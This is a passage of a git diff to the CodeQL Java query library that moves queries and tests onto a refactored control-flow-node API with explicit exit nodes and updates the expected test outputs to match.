a/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll +++ b/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll @@ -73,14 +73,14 @@ class MetricCallable extends Callable { // so there should be a branching point for each non-default switch // case (ignoring those that just fall through to the next case). private predicate branchingSwitchCase(ConstCase sc) { - not sc.(ControlFlowNode).getASuccessor() instanceof SwitchCase and + not sc.getControlFlowNode().getASuccessor().asStmt() instanceof SwitchCase and not defaultFallThrough(sc) } private predicate defaultFallThrough(ConstCase sc) { - exists(DefaultCase default | default.(ControlFlowNode).getASuccessor() = sc) + exists(DefaultCase default | default.getControlFlowNode().getASuccessor().asStmt() = sc) or - defaultFallThrough(sc.(ControlFlowNode).getAPredecessor()) + defaultFallThrough(sc.getControlFlowNode().getAPredecessor().asStmt()) } /** Holds if `stmt` is a branching statement used for the computation of cyclomatic complexity. */ diff --git a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll index 77803e3e27d..e841eb598cc 100644 --- a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll +++ b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll @@ -29,15 +29,19 @@ private module ValidationMethod { */ private predicate validationMethod(Method m, int arg) { exists( - Guard g, SsaImplicitInit var, ControlFlowNode exit, ControlFlowNode normexit, boolean branch + Guard g, SsaImplicitInit var, ControlFlow::ExitNode exit, ControlFlowNode normexit, + boolean branch | validationGuard(g, var.getAUse(), branch) and var.isParameterDefinition(m.getParameter(arg)) and - exit = m and + exit.getEnclosingCallable() = m and normexit.getANormalSuccessor() = exit and 1 = strictcount(ControlFlowNode n | n.getANormalSuccessor() = exit) | - g.(ConditionNode).getABranchSuccessor(branch) = exit or + exists(ConditionNode conditionNode | + g = conditionNode.getCondition() and conditionNode.getABranchSuccessor(branch) = exit + ) + or g.controls(normexit.getBasicBlock(), branch) ) } diff --git a/java/ql/lib/semmle/code/java/security/Validation.qll b/java/ql/lib/semmle/code/java/security/Validation.qll index b8183b10751..50f0a9aab1b 100644 --- a/java/ql/lib/semmle/code/java/security/Validation.qll +++ b/java/ql/lib/semmle/code/java/security/Validation.qll @@ -50,7 +50,7 @@ private predicate validatedAccess(VarAccess va) { bb.getNode(i + 1) = node.getANormalSuccessor() | bb.bbStrictlyDominates(va.getBasicBlock()) or - bb.getNode(any(int j | j > i)) = va + bb.getNode(any(int j | j > i)).asExpr() = va ) ) ) diff --git a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll index e0029ffeba2..2933ae5305e 100644 --- a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll +++ b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.qll @@ -30,7 +30,7 @@ predicate uselessTest(ConditionNode s1, BinaryExpr test, boolean testIsTrue) { ConditionBlock cb, SsaVariable v, BinaryExpr cond, boolean condIsTrue, int k1, int k2, CompileTimeConstantExpr c1, CompileTimeConstantExpr c2 | - s1 = cond and + s1.getCondition() = cond and cb.getCondition() = cond and cond.hasOperands(v.getAUse(), c1) and c1.getIntValue() = k1 and diff --git a/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql b/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql index 241825c092e..17b9fc93d21 100644 --- a/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql +++ b/java/ql/src/Likely Bugs/Concurrency/DoubleCheckedLockingWithInitRace.ql @@ -36,7 +36,7 @@ where doubleCheckedLocking(if1, if2, sync, f) and a.getEnclosingStmt().getEnclosingStmt*() = if2.getThen() and se.getEnclosingStmt().getEnclosingStmt*() = sync.getBlock() and - a.(ControlFlowNode).getASuccessor+() = se and + a.getControlFlowNode().getASuccessor+().asExpr() = se and a.getDest().(FieldAccess).getField() = f select a, "Potential race condition. This assignment to $@ is visible to other threads before the subsequent statements are executed.", diff --git a/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql b/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql index 757da40c6e6..13f4ef7c451 100644 --- a/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql +++ b/java/ql/src/Likely Bugs/Concurrency/LazyInitStaticField.ql @@ -64,12 +64,12 @@ class ValidSynchStmt extends Stmt { exists(MethodCall lockAction | lockAction.getQualifier() = lockField.getAnAccess() and lockAction.getMethod().getName() = "lock" and - dominates(lockAction, this) + dominates(lockAction.getControlFlowNode(), this.getControlFlowNode()) ) and exists(MethodCall unlockAction | unlockAction.getQualifier() = lockField.getAnAccess() and unlockAction.getMethod().getName() = "unlock" and - postDominates(unlockAction, this) + postDominates(unlockAction.getControlFlowNode(), this.getControlFlowNode()) ) ) } diff --git a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql index 4efaf4f9820..d46acc6aee0 100644 --- a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql +++ b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql @@ -59,11 +59,11 @@ class LockType extends RefType { } predicate lockBlock(LockType t, BasicBlock b, int locks) { - locks = strictcount(int i | b.getNode(i) = t.getLockAccess()) + locks = strictcount(int i | b.getNode(i).asExpr() = t.getLockAccess()) } predicate unlockBlock(LockType t, BasicBlock b, int unlocks) { - unlocks = strictcount(int i | b.getNode(i) = t.getUnlockAccess()) + unlocks = strictcount(int i | b.getNode(i).asExpr() = t.getUnlockAccess()) } /** @@ -90,11 +90,11 @@ predicate failedLock(LockType t, BasicBlock lockblock, BasicBlock exblock) { exists(ControlFlowNode lock | lock = lockblock.getLastNode() and ( - lock = t.getLockAccess() + lock.asExpr() = t.getLockAccess() or exists(SsaExplicitUpdate lockbool | // Using the value of `t.getLockAccess()` ensures that it is a `tryLock` call. - lock = lockbool.getAUse() and + lock.asExpr() = lockbool.getAUse() and lockbool.getDefiningExpr().(VariableAssign).getSource() = t.getLockAccess() ) ) and @@ -147,12 +147,12 @@ predicate blockIsLocked(LockType t, BasicBlock src, BasicBlock b, int locks) { ) } -from Callable c, LockType t, BasicBlock src, BasicBlock exit, MethodCall lock +from Callable c, LockType t, BasicBlock src, ExitBlock exit, MethodCall lock where // Restrict results to those methods that actually attempt to unlock. t.getUnlockAccess().getEnclosingCallable() = c and blockIsLocked(t, src, exit, _) and - exit.getLastNode() = c and - lock = src.getANode() and + exit.getEnclosingCallable() = c and + lock = src.getANode().asExpr() and lock = t.getLockAccess() select lock, "This lock might not be unlocked or might be locked more times than it is unlocked." diff --git a/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql b/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql index 7dc893edaef..9cf8ab9b61f 100644 --- a/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql +++ b/java/ql/src/Likely Bugs/Termination/ConstantLoopCondition.ql @@ -61,7 +61,7 @@ predicate mainLoopCondition(LoopStmt loop, Expr cond) { else loopReentry = cond | last.getEnclosingStmt().getEnclosingStmt*() = loop.getBody() and - last.getASuccessor().(Expr).getParent*() = loopReentry + last.getASuccessor().asExpr().getParent*() = loopReentry ) } @@ -75,7 +75,7 @@ where // None of the ssa variables in `cond` are updated inside the loop. forex(SsaVariable ssa, VarRead use | ssa.getAUse() = use and use.getParent*() = cond | not ssa.getCfgNode().getEnclosingStmt().getEnclosingStmt*() = loop or - ssa.getCfgNode().(Expr).getParent*() = loop.(ForStmt).getAnInit() + ssa.getCfgNode().asExpr().getParent*() = loop.(ForStmt).getAnInit() ) and // And `cond` does not use method calls, field reads, or array reads. not exists(MethodCall ma | ma.getParent*() = cond) and diff --git a/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql b/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql index 4e9857f3b93..899218838b9 100644 --- a/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql +++ b/java/ql/src/Security/CWE/CWE-833/LockOrderInconsistency.ql @@ -80,8 +80,8 @@ predicate badReentrantLockOrder(MethodCall first, MethodCall second, MethodCall otherSecond = v1.getLockAction() and second = v2.getLockAction() and otherFirst = v2.getLockAction() and - first.(ControlFlowNode).getASuccessor+() = second and - otherFirst.(ControlFlowNode).getASuccessor+() = otherSecond + first.getControlFlowNode().getASuccessor+() = second.getControlFlowNode() and + otherFirst.getControlFlowNode().getASuccessor+() = otherSecond.getControlFlowNode() | v1 != v2 ) diff --git a/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql b/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql index 312a77878fe..2fe9d3cc672 100644 --- a/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql +++ b/java/ql/src/Violations of Best Practice/Declarations/BreakInSwitchCase.ql @@ -17,7 +17,7 @@ import Common from SwitchStmt s, Stmt c where c = s.getACase() and - not c.(ControlFlowNode).getASuccessor() instanceof SwitchCase and + not c.getControlFlowNode().getASuccessor().asStmt() instanceof SwitchCase and not s.(Annotatable).suppressesWarningsAbout("fallthrough") and mayDropThroughWithoutComment(s, c) select c, diff --git a/java/ql/src/Violations of Best Practice/Declarations/Common.qll b/java/ql/src/Violations of Best Practice/Declarations/Common.qll index 0f95df4b5c4..9211c4b0f29 100644 --- a/java/ql/src/Violations of Best Practice/Declarations/Common.qll +++ b/java/ql/src/Violations of Best Practice/Declarations/Common.qll @@ -24,15 +24,15 @@ predicate switchCaseControlFlowPlus(SwitchStmt switch, BasicBlock b1, BasicBlock exists(BasicBlock mid | switchCaseControlFlowPlus(switch, mid, b2) and switchCaseControlFlow(switch, b1, mid) and - not mid.getFirstNode() = switch.getACase() + not mid.getFirstNode().asStmt() = switch.getACase() ) } predicate mayDropThroughWithoutComment(SwitchStmt switch, Stmt switchCase) { switchCase = switch.getACase() and exists(Stmt other, BasicBlock b1, BasicBlock b2 | - b1.getFirstNode() = switchCase and - b2.getFirstNode() = other and + b1.getFirstNode().asStmt() = switchCase and + b2.getFirstNode().asStmt() = other and switchCaseControlFlowPlus(switch, b1, b2) and other = switch.getACase() and not fallThroughCommented(other) diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll index 256947a2dc7..0771db5ee32 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll +++ b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulationLib.qll @@ -55,7 +55,7 @@ module SpringViewManipulationConfig implements DataFlow::ConfigSig { // a = "redirect:" + taint` // ``` exists(AddExpr e, StringLiteral sl | - node.asExpr() = e.getControlFlowNode().getASuccessor*() and + node.asExpr() = e.getControlFlowNode().getASuccessor*().asExpr() and sl = e.getLeftOperand*() and sl.getValue().matches(["redirect:%", "ajaxredirect:%", "forward:%"]) ) diff --git a/java/ql/test/library-tests/controlflow/basic/bbStmts.expected b/java/ql/test/library-tests/controlflow/basic/bbStmts.expected index e1a8d6b4ade..0fbf3623f08 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStmts.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbStmts.expected @@ -1,7 +1,7 @@ | Test.java:3:14:3:17 | { ... } | 0 | Test.java:3:14:3:17 | { ... } | | Test.java:3:14:3:17 | { ... } | 1 | Test.java:3:14:3:17 | super(...) | -| Test.java:3:14:3:17 | { ... } | 2 | Test.java:3:14:3:17 | Test | -| Test.java:4:14:4:17 | test | 0 | Test.java:4:14:4:17 | test | +| Test.java:3:14:3:17 | { ... } | 2 | Test.java:3:14:3:17 | Exit | +| Test.java:4:14:4:17 | Exit | 0 | Test.java:4:14:4:17 | Exit | | Test.java:4:21:76:2 | { ... } | 0 | Test.java:4:21:76:2 | { ... } | | Test.java:4:21:76:2 | { ... } | 1 | Test.java:5:3:5:12 | var ...; | | Test.java:4:21:76:2 | { ... } | 2 | Test.java:5:11:5:11 | 0 | diff --git a/java/ql/test/library-tests/controlflow/basic/bbStmts.ql b/java/ql/test/library-tests/controlflow/basic/bbStmts.ql index 89a32acf448..3b16a3844b5 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStmts.ql +++ b/java/ql/test/library-tests/controlflow/basic/bbStmts.ql @@ -3,5 +3,5 @@ import default from BasicBlock b, ControlFlowNode n, int i where b.getNode(i) = n and - b.getFile().(CompilationUnit).fromSource() + b.getEnclosingCallable().getFile().(CompilationUnit).fromSource() select b, i, n diff --git a/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected b/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected index 13382ba1fba..8440209d0a4 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbStrictDominance.expected @@ -1,4 +1,4 @@ -| Test.java:4:21:76:2 | { ... } | Test.java:4:14:4:17 | test | +| Test.java:4:21:76:2 | { ... } | Test.java:4:14:4:17 | Exit | | Test.java:4:21:76:2 | { ... } | Test.java:11:14:14:3 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:14:10:16:3 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:18:3:18:8 | ; | @@ -20,7 +20,7 @@ | Test.java:4:21:76:2 | { ... } | Test.java:60:12:62:5 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:63:9:66:4 | { ... } | | Test.java:4:21:76:2 | { ... } | Test.java:70:3:70:9 | ; | -| Test.java:18:3:18:8 | ; | Test.java:4:14:4:17 | test | +| Test.java:18:3:18:8 | ; | Test.java:4:14:4:17 | Exit | | Test.java:18:3:18:8 | ; | Test.java:22:4:22:10 | ; | | Test.java:18:3:18:8 | ; | Test.java:24:4:24:10 | return ... | | Test.java:18:3:18:8 | ; | Test.java:30:15:33:3 | { ... } | diff --git a/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected b/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected index 0cf2c96d022..0886f784fd9 100644 --- a/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected +++ b/java/ql/test/library-tests/controlflow/basic/bbSuccessor.expected @@ -6,7 +6,7 @@ | Test.java:18:3:18:8 | ; | Test.java:24:4:24:10 | return ... | | Test.java:22:4:22:10 | ; | Test.java:30:15:33:3 | { ... } | | Test.java:22:4:22:10 | ; | Test.java:35:3:35:9 | ; | -| Test.java:24:4:24:10 | return ... | Test.java:4:14:4:17 | test | +| Test.java:24:4:24:10 | return ... | Test.java:4:14:4:17 | Exit | | Test.java:30:15:33:3 | { ... } | Test.java:35:3:35:9 | ; | | Test.java:35:3:35:9 | ; | Test.java:38:9:38:9 | x | | Test.java:38:9:38:9 | x | Test.java:38:16:41:3 | { ... } | @@ -27,4 +27,4 @@ | Test.java:57:15:60:5 | { ... } | Test.java:70:3:70:9 | ; | | Test.java:60:12:62:5 | { ... } | Test.java:54:26:54:26 | j | | Test.java:63:9:66:4 | { ... } | Test.java:54:26:54:26 | j | -| Test.java:70:3:70:9 | ; | Test.java:4:14:4:17 | test | +| Test.java:70:3:70:9 | ; | Test.java:4:14:4:17 | Exit | diff --git a/java/ql/test/library-tests/controlflow/basic/strictDominance.ql b/java/ql/test/library-tests/controlflow/basic/strictDominance.ql index 2d366a4f372..10529b6d5c8 100644 --- a/java/ql/test/library-tests/controlflow/basic/strictDominance.ql +++ b/java/ql/test/library-tests/controlflow/basic/strictDominance.ql @@ -2,5 +2,5 @@ import default import semmle.code.java.controlflow.Dominance from Stmt pre, Stmt post -where strictlyDominates(pre, post) +where strictlyDominates(pre.getControlFlowNode(), post.getControlFlowNode()) select pre, post diff --git a/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql b/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql index 9948718fc83..99268a03c4b 100644 --- a/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql +++ b/java/ql/test/library-tests/controlflow/basic/strictPostDominance.ql @@ -2,5 +2,5 @@ import default import semmle.code.java.controlflow.Dominance from Stmt pre, Stmt post -where strictlyPostDominates(post, pre) +where strictlyPostDominates(post.getControlFlowNode(), pre.getControlFlowNode()) select post, pre diff --git a/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql b/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql index 26d33d9d07b..41b23313ec8 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominanceBad.ql @@ -4,6 +4,6 @@ import semmle.code.java.controlflow.Dominance from IfStmt i, BlockStmt b where b = i.getThen() and - dominates(i.getThen(), b) and - dominates(i.getElse(), b) + dominates(i.getThen().getControlFlowNode(), b.getControlFlowNode()) and + dominates(i.getElse().getControlFlowNode(), b.getControlFlowNode()) select i, b diff --git a/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql b/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql index 298e0752ee4..5ee23224d5f 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominanceWrong.ql @@ -17,5 +17,5 @@ predicate dominanceCounterExample(ControlFlowNode entry, ControlFlowNode dom, Co from Callable c, ControlFlowNode dom, ControlFlowNode node where (strictlyDominates(dom, node) or bbStrictlyDominates(dom, node)) and - dominanceCounterExample(c.getBody(), dom, node) + dominanceCounterExample(c.getBody().getControlFlowNode(), dom, node) select c, dom, node diff --git a/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql b/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql index b5bdf688996..9a0d1b0c4bb 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominatedByStart.ql @@ -3,14 +3,14 @@ import default import semmle.code.java.controlflow.Dominance ControlFlowNode reachableIn(Method func) { - result = func.getBody() or + result = func.getBody().getControlFlowNode() or result = reachableIn(func).getASuccessor() } from Method func, ControlFlowNode entry, ControlFlowNode node where - func.getBody() = entry and + func.getBody().getControlFlowNode() = entry and reachableIn(func) = node and entry != node and - not strictlyDominates(func.getBody(), node) + not strictlyDominates(func.getBody().getControlFlowNode(), node) select func, node diff --git a/java/ql/test/library-tests/controlflow/dominance/dominator.expected b/java/ql/test/library-tests/controlflow/dominance/dominator.expected index e0f1596e42b..de43e6721e6 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominator.expected +++ b/java/ql/test/library-tests/controlflow/dominance/dominator.expected @@ -27,7 +27,7 @@ | Test.java:14:18:14:18 | y | Test.java:14:14:14:18 | ... + ... | | Test.java:17:3:17:12 | if (...) | Test.java:17:7:17:7 | x | | Test.java:17:7:17:7 | x | Test.java:17:11:17:11 | 0 | -| Test.java:17:7:17:11 | ... < ... | Test.java:2:6:2:9 | test | +| Test.java:17:7:17:11 | ... < ... | Test.java:2:6:2:9 | Exit | | Test.java:17:7:17:11 | ... < ... | Test.java:18:4:18:10 | ; | | Test.java:17:7:17:11 | ... < ... | Test.java:20:11:20:11 | z | | Test.java:17:11:17:11 | 0 | Test.java:17:7:17:11 | ... < ... | @@ -163,7 +163,7 @@ | Test.java:83:9:83:9 | c | Test.java:83:5:83:9 | ...=... | | Test.java:85:4:85:15 | if (...) | Test.java:85:8:85:8 | a | | Test.java:85:8:85:8 | a | Test.java:85:13:85:14 | 10 | -| Test.java:85:8:85:14 | ... == ... | Test.java:74:6:74:10 | test2 | +| Test.java:85:8:85:14 | ... == ... | Test.java:74:6:74:10 | Exit | | Test.java:85:8:85:14 | ... == ... | Test.java:86:5:86:10 | break | | Test.java:85:8:85:14 | ... == ... | Test.java:87:4:87:15 | if (...) | | Test.java:85:13:85:14 | 10 | Test.java:85:8:85:14 | ... == ... | diff --git a/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql b/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql index 34469a686b1..220e4f275d5 100644 --- a/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql +++ b/java/ql/test/library-tests/controlflow/dominance/dominatorExists.ql @@ -4,13 +4,13 @@ import semmle.code.java.controlflow.Dominance /** transitive dominance */ ControlFlowNode reachableIn(Method func) { - result = func.getBody() or + result = func.getBody().getControlFlowNode() or result = reachableIn(func).getASuccessor() } from Method func, ControlFlowNode node where node = reachableIn(func) and - node != func.getBody() and + node != func.getBody().getControlFlowNode() and not iDominates(_, node) select func, node diff --git a/java/ql/test/library-tests/controlflow/paths/paths.ql b/java/ql/test/library-tests/controlflow/paths/paths.ql index 389c46a48f5..33e51acef78 100644 --- a/java/ql/test/library-tests/controlflow/paths/paths.ql +++ b/java/ql/test/library-tests/controlflow/paths/paths.ql @@ -5,7 +5,7 @@ class PathTestConf extends ActionConfiguration { PathTestConf() { this = "PathTestConf" } override predicate isAction(ControlFlowNode node) { - node.(MethodCall).getMethod().hasName("action") + node.asExpr().(MethodCall).getMethod().hasName("action") } } diff --git a/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected b/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected index 40a8e58c4fe..a849ab5392d 100644 --- a/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected +++ b/java/ql/test/library-tests/java7/MultiCatch/MultiCatchControlFlow.expected @@ -1,4 +1,4 @@ -| MultiCatch.java:6:14:6:23 | super(...) | MultiCatch.java:6:14:6:23 | MultiCatch | +| MultiCatch.java:6:14:6:23 | super(...) | MultiCatch.java:6:14:6:23 | Exit | | MultiCatch.java:6:14:6:23 | { ... } | MultiCatch.java:6:14:6:23 | super(...) | | MultiCatch.java:8:2:20:2 | { ... } | MultiCatch.java:9:3:19:3 | try ... | | MultiCatch.java:9:3:19:3 | try ... | MultiCatch.java:10:3:15:3 | { ... } | @@ -16,7 +16,7 @@ | MultiCatch.java:17:4:17:4 | e | MultiCatch.java:17:4:17:22 | printStackTrace(...) | | MultiCatch.java:17:4:17:22 | printStackTrace(...) | MultiCatch.java:18:10:18:10 | e | | MultiCatch.java:17:4:17:23 | ; | MultiCatch.java:17:4:17:4 | e | -| MultiCatch.java:18:4:18:11 | throw ... | MultiCatch.java:7:14:7:23 | multiCatch | +| MultiCatch.java:18:4:18:11 | throw ... | MultiCatch.java:7:14:7:23 | Exit | | MultiCatch.java:18:10:18:10 | e | MultiCatch.java:18:4:18:11 | throw ... | | MultiCatch.java:23:2:33:2 | { ... } | MultiCatch.java:24:3:32:4 | try ... | | MultiCatch.java:24:3:32:4 | try ... | MultiCatch.java:25:3:31:3 | { ... } | @@ -31,12 +31,12 @@ | MultiCatch.java:28:12:28:12 | c | MultiCatch.java:30:10:30:24 | new Exception(...) | | MultiCatch.java:29:5:29:29 | throw ... | MultiCatch.java:31:5:31:37 | catch (...) | | MultiCatch.java:29:11:29:28 | new SQLException(...) | MultiCatch.java:29:5:29:29 | throw ... | -| MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:22:14:22:24 | multiCatch2 | +| MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:22:14:22:24 | Exit | | MultiCatch.java:30:4:30:25 | throw ... | MultiCatch.java:31:5:31:37 | catch (...) | | MultiCatch.java:30:10:30:24 | new Exception(...) | MultiCatch.java:30:4:30:25 | throw ... | | MultiCatch.java:31:5:31:37 | catch (...) | MultiCatch.java:31:36:31:36 | e | | MultiCatch.java:31:36:31:36 | e | MultiCatch.java:32:3:32:4 | { ... } | -| MultiCatch.java:32:3:32:4 | { ... } | MultiCatch.java:22:14:22:24 | multiCatch2 | +| MultiCatch.java:32:3:32:4 | { ... } | MultiCatch.java:22:14:22:24 | Exit | | MultiCatch.java:36:2:42:2 | { ... } | MultiCatch.java:37:3:41:4 | try ... | | MultiCatch.java:37:3:41:4 | try ... | MultiCatch.java:38:3:40:3 | { ... } | | MultiCatch.java:38:3:40:3 | { ... } | MultiCatch.java:39:10:39:26 | new IOException(...) | @@ -45,4 +45,4 @@ | MultiCatch.java:39:10:39:26 | new IOException(...) | MultiCatch.java:40:5:40:22 | catch (...) | | MultiCatch.java:40:5:40:22 | catch (...) | MultiCatch.java:40:21:40:21 | e | | MultiCatch.java:40:21:40:21 | e | MultiCatch.java:41:3:41:4 | { ... } | -| MultiCatch.java:41:3:41:4 | { ... } | MultiCatch.java:35:14:35:26 | ordinaryCatch | +| MultiCatch.java:41:3:41:4 | { ... } | MultiCatch.java:35:14:35:26 | Exit | diff --git a/java/ql/test/library-tests/pattern-instanceof/cfg.expected b/java/ql/test/library-tests/pattern-instanceof/cfg.expected index 29de1e4a3a8..b6caebd532a 100644 --- a/java/ql/test/library-tests/pattern-instanceof/cfg.expected +++ b/java/ql/test/library-tests/pattern-instanceof/cfg.expected @@ -1,4 +1,4 @@ -| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Test | +| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Exit | | Test.java:1:14:1:17 | { ... } | Test.java:1:14:1:17 | super(...) | | Test.java:3:40:20:3 | { ... } | Test.java:5:5:5:34 | var ...; | | Test.java:5:5:5:34 | var ...; | Test.java:5:26:5:33 | source(...) | @@ -29,7 +29,7 @@ | Test.java:11:12:11:12 | s | Test.java:11:7:11:13 | sink(...) | | Test.java:14:5:14:92 | if (...) | Test.java:14:9:14:9 | o | | Test.java:14:9:14:9 | o | Test.java:14:9:14:91 | ...instanceof... | -| Test.java:14:9:14:91 | ...instanceof... | Test.java:3:22:3:25 | test | +| Test.java:14:9:14:91 | ...instanceof... | Test.java:3:22:3:25 | Exit | | Test.java:14:9:14:91 | ...instanceof... | Test.java:14:41:14:47 | tainted | | Test.java:14:22:14:91 | Outer(...) | Test.java:14:94:18:5 | { ... } | | Test.java:14:28:14:67 | Inner(...) | Test.java:14:77:14:90 | alsoNotTainted | @@ -43,15 +43,15 @@ | Test.java:16:7:16:22 | sink(...) | Test.java:17:7:17:27 | ; | | Test.java:16:7:16:23 | ; | Test.java:16:12:16:21 | notTainted | | Test.java:16:12:16:21 | notTainted | Test.java:16:7:16:22 | sink(...) | -| Test.java:17:7:17:26 | sink(...) | Test.java:3:22:3:25 | test | +| Test.java:17:7:17:26 | sink(...) | Test.java:3:22:3:25 | Exit | | Test.java:17:7:17:27 | ; | Test.java:17:12:17:25 | alsoNotTainted | | Test.java:17:12:17:25 | alsoNotTainted | Test.java:17:7:17:26 | sink(...) | | Test.java:22:33:22:53 | { ... } | Test.java:22:42:22:50 | "tainted" | -| Test.java:22:35:22:51 | return ... | Test.java:22:24:22:29 | source | +| Test.java:22:35:22:51 | return ... | Test.java:22:24:22:29 | Exit | | Test.java:22:42:22:50 | "tainted" | Test.java:22:35:22:51 | return ... | -| Test.java:23:40:23:42 | { ... } | Test.java:23:22:23:25 | sink | +| Test.java:23:40:23:42 | { ... } | Test.java:23:22:23:25 | Exit | | Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | ; | -| Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | Outer | +| Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | Exit | | Test.java:27:8:27:12 | ; | Test.java:27:8:27:12 | this | | Test.java:27:8:27:12 | ; | Test.java:27:8:27:12 | this | | Test.java:27:8:27:12 | i | Test.java:27:8:27:12 | ...=... | @@ -61,7 +61,7 @@ | Test.java:27:8:27:12 | this | Test.java:27:8:27:12 | otherField | | Test.java:27:8:27:12 | { ... } | Test.java:27:8:27:12 | super(...) | | Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | ; | -| Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | Inner | +| Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | Exit | | Test.java:28:8:28:12 | ; | Test.java:28:8:28:12 | this | | Test.java:28:8:28:12 | ; | Test.java:28:8:28:12 | this | | Test.java:28:8:28:12 | nonTaintedField | Test.java:28:8:28:12 | ...=... | diff --git a/java/ql/test/library-tests/pattern-instanceof/cfg.ql b/java/ql/test/library-tests/pattern-instanceof/cfg.ql index 0b07e8c4708..db2cc49bc0b 100644 --- a/java/ql/test/library-tests/pattern-instanceof/cfg.ql +++ b/java/ql/test/library-tests/pattern-instanceof/cfg.ql @@ -1,5 +1,5 @@ import java from ControlFlowNode cn -where cn.getFile().getBaseName() = "Test.java" +where cn.getLocation().getFile().getBaseName() = "Test.java" select cn, cn.getASuccessor() diff --git a/java/ql/test/library-tests/pattern-switch/cfg/test.expected b/java/ql/test/library-tests/pattern-switch/cfg/test.expected index a63aa788668..c29059faf33 100644 --- a/java/ql/test/library-tests/pattern-switch/cfg/test.expected +++ b/java/ql/test/library-tests/pattern-switch/cfg/test.expected @@ -1,6 +1,6 @@ -| Exhaustive.java:1:14:1:23 | super(...) | Exhaustive.java:1:14:1:23 | Exhaustive | +| Exhaustive.java:1:14:1:23 | super(...) | Exhaustive.java:1:14:1:23 | Exit | | Exhaustive.java:1:14:1:23 | { ... } | Exhaustive.java:1:14:1:23 | super(...) | -| Exhaustive.java:3:8:3:8 | super(...) | Exhaustive.java:3:8:3:8 | E | +| Exhaustive.java:3:8:3:8 | super(...) | Exhaustive.java:3:8:3:8 | Exit | | Exhaustive.java:3:8:3:8 | { ... } | Exhaustive.java:3:8:3:8 | super(...) | | Exhaustive.java:3:8:3:8 | { ... } | Exhaustive.java:3:12:3:12 | ; | | Exhaustive.java:3:12:3:12 | ...=... | Exhaustive.java:3:15:3:15 | ; | @@ -9,12 +9,12 @@ | Exhaustive.java:3:15:3:15 | ...=... | Exhaustive.java:3:18:3:18 | 